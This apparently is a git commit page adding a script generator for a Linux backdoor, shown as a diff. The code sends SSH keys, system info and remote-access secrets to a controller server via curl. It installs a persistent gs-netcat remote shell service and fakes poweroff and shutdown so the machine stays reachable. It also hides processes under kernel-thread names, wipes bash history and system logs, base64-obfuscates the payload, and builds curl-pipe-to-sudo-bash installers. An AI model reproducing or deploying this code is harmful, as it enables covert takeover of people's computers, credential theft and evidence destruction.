elleoma/facinus
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Amoelle
2025-04-04 23:55:37 +03:00
parent dc999a83d9
commit 2936d18770
1 changed files with 571 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

571
generate_scripts.sh
View File

@@ -95,3 +95,574 @@ send_logs() {
local sysinfo=$(get_system_info)
local hostname=$(hostname)
# Submit logs to the server
curl -s -X POST "$LOG_ENDPOINT" \
-F "auth_token=$AUTH_TOKEN" \
-F "hostname=$hostname" \
-F "log_data=@$log_file" \
-F "system_info=$sysinfo" \
-F "secret_type=$secret_type" \
-F "secret_value=$secret_val" \
> /dev/null
}
detect_package_manager() {
# Detect the system's package manager
if command -v apt-get &> /dev/null; then
echo "apt"
elif command -v dnf &> /dev/null; then
echo "dnf"
elif command -v yum &> /dev/null; then
echo "yum"
elif command -v pacman &> /dev/null; then
echo "pacman"
elif command -v zypper &> /dev/null; then
echo "zypper"
else
echo "unknown"
fi
}
# ------- INSTALLATION FUNCTIONS -------
install_ssh() {
local log_file="$TEMP_DIR/ssh_install.log"
touch "$log_file"
echo "[*] Installing SSH server..."
local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in
apt)
if ! dpkg -s openssh-server &> /dev/null; then
log_cmd "sudo apt-get update" "Updating package lists" "$log_file"
log_cmd "sudo apt-get install -y openssh-server" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable ssh" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start ssh" "Starting SSH service" "$log_file"
;;
dnf|yum)
if ! rpm -q openssh-server &> /dev/null; then
log_cmd "sudo $pkg_manager install -y openssh-server" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file"
;;
pacman)
if ! pacman -Q openssh &> /dev/null; then
log_cmd "sudo pacman -S --noconfirm openssh" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file"
;;
zypper)
if ! rpm -q openssh-server &> /dev/null; then
log_cmd "sudo zypper install -y openssh-server" "Installing OpenSSH server" "$log_file"
fi
log_cmd "sudo systemctl enable sshd" "Enabling SSH service" "$log_file"
log_cmd "sudo systemctl start sshd" "Starting SSH service" "$log_file"
;;
*)
echo "[!] Unsupported package manager. SSH server installation skipped."
return 1
;;
esac
# Get SSH key if it exists
if [ -f ~/.ssh/id_rsa.pub ]; then
send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key"
else
# Try to create a new key if it doesn't exist
log_cmd "ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa" "Generating SSH key" "$log_file"
if [ -f ~/.ssh/id_rsa.pub ]; then
send_logs "$log_file" "$(cat ~/.ssh/id_rsa.pub)" "ssh_key"
fi
fi
# Send SSH configuration
local ssh_port=$(grep -E "^Port " /etc/ssh/sshd_config | awk '{print $2}')
[ -z "$ssh_port" ] && ssh_port=22
send_logs "$log_file" "{\"port\":$ssh_port}" "ssh_config"
echo "[+] SSH server installed and configured."
}
setup_wol() {
local log_file="$TEMP_DIR/wol_setup.log"
touch "$log_file"
echo "[*] Setting up Wake-on-LAN..."
# Install ethtool if needed
local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in
apt)
if ! dpkg -s ethtool &> /dev/null; then
log_cmd "sudo apt-get install -y ethtool" "Installing ethtool" "$log_file"
fi
;;
dnf|yum)
if ! rpm -q ethtool &> /dev/null; then
log_cmd "sudo $pkg_manager install -y ethtool" "Installing ethtool" "$log_file"
fi
;;
pacman)
if ! pacman -Q ethtool &> /dev/null; then
log_cmd "sudo pacman -S --noconfirm ethtool" "Installing ethtool" "$log_file"
fi
;;
zypper)
if ! rpm -q ethtool &> /dev/null; then
log_cmd "sudo zypper install -y ethtool" "Installing ethtool" "$log_file"
fi
;;
*)
echo "[!] Unsupported package manager. WoL setup may be incomplete."
;;
esac
# Get the primary interface
local interface=$(ip route | grep default | awk '{print $5}' | head -n1)
if [ -z "$interface" ]; then
echo "[!] No network interface found."
return 1
fi
# Check current WoL status
log_cmd "sudo ethtool $interface" "Checking interface capabilities" "$log_file"
# Try to enable WoL
log_cmd "sudo ethtool -s $interface wol g" "Enabling Wake-on-LAN" "$log_file"
# Create persistent configuration
cat > "$TEMP_DIR/wol.service" << EOF
[Unit]
Description=Enable Wake-on-LAN on $interface
After=network.target
[Service]
Type=oneshot
ExecStart=/usr/sbin/ethtool -s $interface wol g
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
sudo mv "$TEMP_DIR/wol.service" /etc/systemd/system/wol.service
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable wol.service" "Enabling WoL service" "$log_file"
log_cmd "sudo systemctl start wol.service" "Starting WoL service" "$log_file"
# Get MAC address for WoL
local mac=$(ip link show $interface | grep -E 'link/ether' | awk '{print $2}')
send_logs "$log_file" "{\"interface\":\"$interface\",\"mac\":\"$mac\"}" "wol_config"
echo "[+] Wake-on-LAN configured for interface $interface (MAC: $mac)."
}
setup_fake_poweroff() {
local log_file="$TEMP_DIR/fake_poweroff.log"
touch "$log_file"
echo "[*] Setting up fake poweroff..."
# Create the fake poweroff script
cat > "$TEMP_DIR/fake-poweroff.sh" << 'EOF'
#!/bin/bash
# This script intercepts poweroff/shutdown commands and fakes a shutdown
# Backup original commands if not already done
if [ ! -f /usr/bin/poweroff.real ]; then
sudo cp /usr/bin/poweroff /usr/bin/poweroff.real
fi
if [ ! -f /usr/bin/shutdown.real ]; then
sudo cp /usr/bin/shutdown /usr/bin/shutdown.real
fi
# Create the fake scripts
cat > "$TEMP_DIR/fake-poweroff" << 'EOT'
#!/bin/bash
# Fake poweroff script that just locks the screen
echo "System is powering off..."
# Change to TTY1 and clear screen
sudo chvt 1
sudo clear
# Display fake shutdown messages
echo -e "\n\n * Unmounting filesystems..."
sleep 0.5
echo " * Stopping system services..."
sleep 0.7
echo " * Powering off system..."
sleep 1
# Turn off display if possible
xset dpms force off &> /dev/null || true
# Lock system
loginctl lock-session &> /dev/null || true
# Wait forever in background
(while true; do sleep 1000; done) &
# Make it hard to exit with Ctrl+C
trap "" INT TERM
# Just wait here
sleep infinity
EOT
chmod +x "$TEMP_DIR/fake-poweroff"
sudo mv "$TEMP_DIR/fake-poweroff" /usr/local/bin/fake-poweroff
# Replace the original commands with wrappers to our fake script
cat > "$TEMP_DIR/poweroff-wrapper" << 'EOT'
#!/bin/bash
# Check for force flag
if [[ " $* " == *" -f "* ]] || [[ " $* " == *" --force "* ]]; then
exec /usr/bin/poweroff.real "$@"
else
exec /usr/local/bin/fake-poweroff
fi
EOT
chmod +x "$TEMP_DIR/poweroff-wrapper"
sudo mv "$TEMP_DIR/poweroff-wrapper" /usr/bin/poweroff
cat > "$TEMP_DIR/shutdown-wrapper" << 'EOT'
#!/bin/bash
# Check for force flag
if [[ " $* " == *" -f "* ]] || [[ " $* " == *" --force "* ]]; then
exec /usr/bin/shutdown.real "$@"
else
exec /usr/local/bin/fake-poweroff
fi
EOT
chmod +x "$TEMP_DIR/shutdown-wrapper"
sudo mv "$TEMP_DIR/shutdown-wrapper" /usr/bin/shutdown
EOF
log_cmd "bash $TEMP_DIR/fake-poweroff.sh" "Installing fake poweroff scripts" "$log_file"
send_logs "$log_file" "Fake poweroff installed" "fake_poweroff"
echo "[+] Fake poweroff configured. Normal shutdown commands will now fake a shutdown."
echo " Use 'poweroff -f' or 'shutdown -f' for an actual shutdown."
}
install_gsocket() {
local log_file="$TEMP_DIR/gsocket_install.log"
touch "$log_file"
echo "[*] Installing gsocket for remote access..."
# Install dependencies
local pkg_manager=$(detect_package_manager)
case "$pkg_manager" in
apt)
log_cmd "sudo apt-get update" "Updating package lists" "$log_file"
log_cmd "sudo apt-get install -y build-essential git libssl-dev" "Installing build dependencies" "$log_file"
;;
dnf|yum)
log_cmd "sudo $pkg_manager install -y gcc gcc-c++ make git openssl-devel" "Installing build dependencies" "$log_file"
;;
pacman)
log_cmd "sudo pacman -S --noconfirm base-devel git openssl" "Installing build dependencies" "$log_file"
;;
zypper)
log_cmd "sudo zypper install -y -t pattern devel_basis" "Installing development pattern" "$log_file"
log_cmd "sudo zypper install -y git libopenssl-devel" "Installing additional dependencies" "$log_file"
;;
*)
echo "[!] Unsupported package manager. Attempting to continue with gsocket installation."
;;
esac
# Clone and build gsocket
log_cmd "git clone https://github.com/hackerschoice/gsocket.git $TEMP_DIR/gsocket" "Cloning gsocket repository" "$log_file"
log_cmd "cd $TEMP_DIR/gsocket && ./configure && make" "Building gsocket" "$log_file"
log_cmd "cd $TEMP_DIR/gsocket && sudo make install" "Installing gsocket" "$log_file"
# Generate a unique secret
local gs_secret=$(head -c 16 /dev/urandom | xxd -p)
# Create systemd service for persistent connection
cat > "$TEMP_DIR/gsocket-backdoor.service" << EOF
[Unit]
Description=GSocket Remote Access
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/gs-netcat -s $gs_secret -l -q -i
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null
[Install]
WantedBy=default.target
EOF
sudo mv "$TEMP_DIR/gsocket-backdoor.service" /etc/systemd/system/
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable gsocket-backdoor.service" "Enabling gsocket service" "$log_file"
log_cmd "sudo systemctl start gsocket-backdoor.service" "Starting gsocket service" "$log_file"
# Also create a user service if running as non-root
if [ $EUID -ne 0 ]; then
mkdir -p ~/.config/systemd/user/
cp /etc/systemd/system/gsocket-backdoor.service ~/.config/systemd/user/
log_cmd "systemctl --user daemon-reload" "Reloading user systemd" "$log_file"
log_cmd "systemctl --user enable gsocket-backdoor.service" "Enabling user gsocket service" "$log_file"
log_cmd "systemctl --user start gsocket-backdoor.service" "Starting user gsocket service" "$log_file"
fi
# Create connection instructions
cat > "$TEMP_DIR/gsocket-info.txt" << EOF
GSocket Connection Information
=============================
Secret: $gs_secret
Connection command: gs-netcat -s $gs_secret
EOF
# Send the gsocket secret to the server
send_logs "$log_file" "$gs_secret" "gsocket_secret"
echo "[+] GSocket installed. You can connect using: gs-netcat -s $gs_secret"
}
setup_stealth() {
local log_file="$TEMP_DIR/stealth_setup.log"
touch "$log_file"
echo "[*] Setting up stealth mode..."
# Hide processes by creating a systemd unit with hidden name
cat > "$TEMP_DIR/.service" << 'EOF'
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do sleep 3600; done'
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null
[Install]
WantedBy=default.target
EOF
sudo mv "$TEMP_DIR/.service" /etc/systemd/system/
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable .service" "Enabling hidden service" "$log_file"
log_cmd "sudo systemctl start .service" "Starting hidden service" "$log_file"
# Create a hidden directory for tools
log_cmd "mkdir -p ~/.config/.hidden" "Creating hidden directory" "$log_file"
# Set up process name obfuscation script
cat > "$TEMP_DIR/obfuscate.sh" << 'EOF'
#!/bin/bash
# This script allows running commands with an obfuscated process name
# Function to run a command with an obfuscated name
obfuscate_run() {
local fake_name="$1"
shift
exec -a "$fake_name" "$@"
}
# Install the function to user's bashrc
if ! grep -q "obfuscate_run" ~/.bashrc; then
cat >> ~/.bashrc << 'EOT'
# Obfuscation function
obfuscate_run() {
local fake_name="$1"
shift
exec -a "$fake_name" "$@"
}
EOT
fi
# Create helper aliases
if ! grep -q "alias stealthy" ~/.bashrc; then
cat >> ~/.bashrc << 'EOT'
alias stealthy='obfuscate_run "[khugepageds]"'
alias hidden='obfuscate_run "[migration/0]"'
EOT
fi
# Install a cron job to clear bash history periodically
(crontab -l 2>/dev/null; echo "0 * * * * cat /dev/null > ~/.bash_history") | crontab -
EOF
log_cmd "bash $TEMP_DIR/obfuscate.sh" "Setting up process obfuscation" "$log_file"
# Create log rotation to clean service logs
cat > "$TEMP_DIR/clean-logs.service" << 'EOF'
[Unit]
Description=Clean System Logs
After=network.target
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'find /var/log -type f -name "*.log" -exec truncate -s 0 {} \;'
ExecStart=/bin/bash -c 'journalctl --vacuum-time=1d'
[Install]
WantedBy=default.target
EOF
sudo mv "$TEMP_DIR/clean-logs.service" /etc/systemd/system/
cat > "$TEMP_DIR/clean-logs.timer" << 'EOF'
[Unit]
Description=Run log cleaning daily
After=network.target
[Timer]
OnBootSec=15min
OnUnitActiveSec=1d
[Install]
WantedBy=timers.target
EOF
sudo mv "$TEMP_DIR/clean-logs.timer" /etc/systemd/system/
log_cmd "sudo systemctl daemon-reload" "Reloading systemd" "$log_file"
log_cmd "sudo systemctl enable clean-logs.timer" "Enabling log cleaning" "$log_file"
log_cmd "sudo systemctl start clean-logs.timer" "Starting log cleaning" "$log_file"
send_logs "$log_file" "Stealth mode activated" "stealth_mode"
echo "[+] Stealth mode configured."
}
# ------- MAIN EXECUTION -------
main() {
local log_file="$TEMP_DIR/main.log"
touch "$log_file"
echo "[*] Beginning setup..."
echo "[*] Target system: $(hostname) ($(whoami))"
# Send initial system info
send_logs "$log_file" "$(get_system_info)" "system_info"
# Install components based on flags
install_ssh
setup_wol
setup_fake_poweroff
install_gsocket
setup_stealth
echo "[+] Setup complete."
echo "[+] All logs and credentials have been sent to the server."
}
# Run the main function
main
EOF
# Replace placeholders in the script
sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" "$TEMP_DIR/y"
sed -i "s|TOKEN_PLACEHOLDER|$SECRET_TOKEN|g" "$TEMP_DIR/y"
# Copy the script to the server
sudo cp "$TEMP_DIR/y" "$SERVER_ROOT/"
sudo chmod 644 "$SERVER_ROOT/y"
}
generate_obfuscated_script() {
echo "Creating obfuscated version of the client script..."
# Base64 encode the script to obfuscate it
base64 -w0 < "$TEMP_DIR/y" > "$TEMP_DIR/y.b64"
# Create a wrapper script that decodes and executes
cat > "$TEMP_DIR/x" << 'EOF'
#!/bin/bash
# This is an obfuscated setup script
if command -v base64 >/dev/null 2>&1; then
eval "$(echo "BASE64_PLACEHOLDER" | base64 -d)"
else
echo "Error: Base64 not available."
exit 1
fi
EOF
# Replace the placeholder with the actual base64 content
sed -i "s|BASE64_PLACEHOLDER|$(cat "$TEMP_DIR/y.b64")|g" "$TEMP_DIR/x"
# Copy the obfuscated script to the server
sudo cp "$TEMP_DIR/x" "$SERVER_ROOT/"
sudo chmod 644 "$SERVER_ROOT/x"
echo "Obfuscated script created."
}
generate_presets() {
echo "Creating installation presets..."
# Create minimal preset (no root required)
cat > "$TEMP_DIR/minimal" << 'EOF'
#!/bin/bash
# Minimal installation preset - no root required
export NO_ROOT=true
export NO_SERVICES=true
export INSTALL_WOL=false
export INSTALL_FAKE_POWEROFF=false
export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script
curl -fsSL "http://SERVER_PLACEHOLDER/deployment/y" | bash
EOF
# Create full preset (all features)
cat > "$TEMP_DIR/full" << 'EOF'
#!/bin/bash
# Full installation preset - requires root
export NO_ROOT=false
export NO_SERVICES=false
export INSTALL_WOL=true
export INSTALL_FAKE_POWEROFF=true
export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script with sudo
curl -fsSL "http://SERVER_PLACEHOLDER/deployment/y" | sudo bash
EOF
# Create quiet preset (minimal output)
cat > "$TEMP_DIR/quiet" << 'EOF'
#!/bin/bash
# Quiet installation preset - minimal output
export VERBOSE=false
export NO_ROOT=false
export NO_SERVICES=false
export INSTALL_WOL=true
export INSTALL_FAKE_POWEROFF=true
export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Redirect output to /dev/null for quieter operation
(curl -fsSL "http://SERVER_PLACEHOLDER/deployment/y" | sudo bash) &>/dev/null &
EOF
# Replace placeholders
for preset in "$TEMP_DIR/minimal" "$TEMP_DIR/full" "$TEMP_DIR/quiet"; do
sed -i "s|SERVER_PLACEHOLDER|$SERVER_IP|g" "$preset"
sudo cp "$preset" "$SERVER_ROOT/"
sudo chmod 644 "$SERVER_ROOT/$(basename "$preset")"
done
echo "Installation presets created."
}